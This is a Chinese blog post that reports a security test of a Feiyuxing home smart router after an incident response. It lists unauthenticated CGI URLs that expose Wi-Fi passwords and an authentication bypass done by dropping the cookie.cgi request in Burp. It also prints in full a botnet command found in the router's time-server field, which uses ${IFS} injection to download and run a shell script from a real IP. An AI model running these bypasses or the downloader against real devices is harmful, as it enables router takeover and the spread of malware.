【渗透实战系列】飞鱼星家庭路由器越权发现的木马传播事件

原创 已于 2023-06-19 09:06:36 修改 · 1.6k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2023-06-15 17:58:02 首次发布
文章讲述了作者在应对一起路由器中毒事件后,对飞鱼星家庭智能路由器进行的安全测试。测试发现未授权访问漏洞,可通过特定参数获取Wi-Fi信息,以及越权登录方法。此外,还揭示了路由器后台存在僵尸木马下载传播的隐患,提醒用户注意家庭路由器的安全设置。

一、前言

事情是这样,最近这段时间收到一次应急,据说是路由器中毒了访问了挖矿域名,后面看了一下后还是因为NAT原因导致的。不过因为这起事件勾起了我对家庭路由器漏洞利用兴趣,于是就有了这篇文章的诞生。

二、飞鱼星家庭智能路由器yi

这次是用“飞鱼星家庭智能路由器”来做的测试!

2.1 漏洞资产

title="飞鱼星家用智能路由"

2.2 未授权访问

/request_para.cgi?parameter=wifi_info          #获取 WIFI账号密码
/request_para.cgi?parameter=wifi_get_5g_host   #获取5GWIFI账号密码
/request_para.cgi?parameter=wifi_get_2g_host   #获取2GWIFI账号密码

2.3 越权登录

步骤:访问index.html,然后⽤burp抓包drop掉cookie.cgi这个包。

1).访问index.html页面。
在这里插入图片描述

在这里插入图片描述
2).使用burp drop掉cookie.cgi的请求包
在这里插入图片描述
3).成功越权登录到后台的管理界面。
在这里插入图片描述

2.3 发现僵尸木马传播下载事件

Tips:这里是在越权测试过程中,发现在【系统设置】-【高级】的时间服务器地址这里发现存在木马脚本下载代码。
在这里插入图片描述完整代码如下,就放这里了:

`cd${IFS}../;cd${IFS}/tmp/;wget${IFS}http://95.214.27.53/download.sh;curl${IFS}-O${IFS}http://95.214.27.53/download.sh;sh${IFS}download.sh`

至此,这次家庭路由器的测试就到这里了。这些漏洞的利用基本上都很简单,至于后面发现的僵尸网络下载传播事件,倒是一个意外的收获,这次事件也告诫各位师傅,自己的小路由器可别直接通过公网IP连互联网哦!
不过现在的家庭宽带好像都是运营商的光猫来拨号,小路由器就用来释放WiFi信号用,起码我这是这样。

飞鱼 企业级智能上网行为管理系统 权限绕过信息泄露漏洞
失心少年
06-27 1516
飞鱼 企业级智能上网行为管理系统 存在权限绕过以及信息泄露漏洞,可以获取管理员权限以及用户密码。其中使用Burp Durp 掉 cookie.cgi 请求包。title=“飞鱼企业级智能上网行为管理系统”飞鱼 企业级智能上网行为管理系统。访问主页使用Burp抓包。
漏洞复现】飞鱼路由器COOKIE.CGI权限绕过漏洞
晚风不及你
02-06 1368
成都飞鱼科技股份有限公司是服务于企业、商业和家庭用户,提供智能易用的网络通讯管理设备与创新科技的增值服务。
飞鱼企业级智能上网行为管理系统​ send_order.cgi 前台RCE漏洞复现
0xSec
03-20 1479
飞鱼企业级智能上网行为管理系统send_order.cgi接口处存在远程命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,且写入后门文件可获取服务器权限,造成严重威胁。
飞鱼企业级智能上网行为管理系统 越权漏洞
m0_49025459的博客
01-31 1177
飞鱼企业级智能无线上网行为管理系统以及众多产品存在权限绕过漏洞 漏洞分类:逻辑漏洞 影响版本:全版本
飞鱼路由器 越权漏洞漏洞复现】
m0_64366018的博客
01-26 1534
丢掉包后,就可以越权
飞鱼路由器怎么设置PPPOE拨号上网?
10-01
设置飞鱼路由器进行PPPOE拨号上网的方法主要包含以下步骤: 1. 硬件连接:首先,需要确保电脑连接到路由器。这一步骤通常使用一根网线将电脑的有线网卡接口与路由器的LAN接口相连。在这种连接方式下,电脑本地...
飞鱼路由器花怎么设置端口映射?
10-01
在设置飞鱼路由器的端口映射时,主要涉及到的操作有查询路由器的WAN口IP地址、设置端口映射以及配置动态域名系统(DDNS)。接下来,我们将逐一详细解释这些操作所涉及的知识点。 首先,端口映射是一种网络技术,...
飞鱼路由器无线网故障的六个例子分析
10-02
飞鱼路由器无线网故障的分析涉及到多个方面,这些故障大多源自无线设备的使用环境、配置不当或硬件问题。以下是对六个例子的详细解析: 1. **案例一**:当台式机和笔记本在同一房间内连接同一无线路由器,但仍然...
飞鱼VW1200值得买吗?飞鱼1200M企业级路由器+MU-MIMO全面图解评测
10-01
飞鱼VW1200是一款专为企业级应用设计的1200M无线路由器,采用802.11ac Wave 2标准,具备MU-MIMO技术,旨在为中小企业和微商用户提供高效稳定的网络解决方案。这款路由器的核心特点是集成了高级的QoS流控、网络行为...
飞鱼路由器htpasswd存在信息泄露漏洞
缘梦未来的博客
12-20 543
飞鱼(Volans) 是一家专注于网络设备研发和生产的中国企业,致力于提供高性能的网络解决方案。飞鱼路由器以其简单易用、高性价比、强大管理功能而闻名,广泛应用于中小型企业、教育机构、酒店以及家庭网络环境中。
飞鱼-路由器存在信息泄露漏洞漏洞复现】
最新发布
weixin_72586863的博客
12-26 1498
产品描述: 飞鱼路由器是由成都飞鱼科技股份有限公司研发的网络设备,该公司提供全场景无线网络解决方案、企业级无线路由器等产品及方案。漏洞描述: 飞鱼路由器存在未授权访问且回显用户名密码的问题,攻击者可以通过MD5碰撞后进行登录,使得系统处于不安全状态。如有侵权请联系本人。
【复现】飞鱼上网行为管理系统RCE漏洞_67
fushuang333的博客
04-03 1609
【复现】飞鱼上网行为管理系统RCE漏洞,通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。继承Web服务器程序的权限,去执行系统命令,控制整个服务器。
漏洞复现】飞鱼企业级智能上网行为管理系统​ send_order.cgi 前台RCE漏洞
qq_34780861的博客
03-21 1155
飞鱼上网行为管理系统企业版前台RCE,攻击者可通过此漏洞获取服务器权限。
手机没Root?你照样可以渗透路由器
weixin_34191734的博客
08-15 1161
和Metasploit差不多,RouterSploit是一个强大的漏洞利用框架,用于快速识别和利用路由器中的普通漏洞,它还有个亮点,就是可以在绝大多数安卓设备上运行。 如果你想在电脑上运行,可以阅读这篇文章,而这篇教程则会告诉你如何轻松地在未Root的安卓设备上安装RouterSploit,这样一来,只要你的智能手机可以连接这些有漏洞路由器,你就可以渗透他们。 RouterSploit vs 路...
飞鱼路由器 信息泄露(附脚本)
iSee857的博客
12-19 458
飞鱼路由器某文件存在未授权访问且回显用户名密码,攻击者通过md5碰撞后可进行登录,使得系统处于极度不安全状态。
WireShark黑客发现之旅(8)—针对路由器的Linux木马
weixin_33750452的博客
03-08 880
聚锋实验室 · 2016/04/25 10:24Author:Mr.Right、Gongmo申明:文中提到的攻击方式仅为曝光、打击恶意网络攻击行为,切勿模仿,否则后果自负。0x00 前言路由器木马,其主要目标是控制网络的核心路由设备;一旦攻击成功,其危害性远大于一台主机被控。如果仅仅在路由器上面防范该类木马,那也是不够的,有很多Linux服务器违规开放Telnet端口,且使用了弱口令,一样可以中招...
记一次渗透测试某路由器
weixin_30872157的博客
04-26 1266
开局一个路由器渗透全靠莽,漏洞全靠猜!简单记录一下~ 某个厂商的路由器,网上找不到该型号路由器的相关资料,固件也搜索不出来! 插上网线,连接到路由器,获得路由器地址,放弃常规的从web管理界面开始的套路,先查看开放的端口信息如下: ssh端口开放,测试发现存在用户名枚举漏洞,存在用户root,爆破也没有什么结果: ssh登录提示警告,登录禁止,所以就算爆破出来密码也没啥...
iPhone/iPad通过iSH安装Routersploit对路由器进行渗透【AlpineLinux】【Routersploit】【踩坑&绕坑】
TangYuanMaster's Blog
03-04 4383
【最后一次更新:2023.3.4】 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任~ 「文末见iOS整活计划」 文章目录 1.RSF「routersploit」简介 2.安装RSF 3.RSF渗透演示 3.1RSF模块与其它说明 3.1扫描漏洞 3.2利用漏洞 4.警告 【转载请注明出处及原作者】 1.RSF「routersploit」简介 RouterSploit包含了2
路由渗透和路由泄露
weixin_65551798的博客
07-11 2130
因为没有路由泄露之前,r1去往r4的时候是从上面开销值比较大的地方走,但是这个路由表中,不仅有开始的默认路由,现在又多了一些明细路由,虽说路由泄露进来的路由能够感知cost,但是比默认路由小但是,,因为最长掩码匹配原则,他会选择掩码比较长的那一个。因为在r2和r3上都做了路由过滤,在路由过滤调用的acl中,只允许了去往10.0.234.0网段的路由,并且在路由协议上调用acl,在下面默认有一条拒绝所有,所以路由表里面只有这一条路由。但是因为路由泄露把骨干区域所有的路由都进行传递进来了,安全性大度降低。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值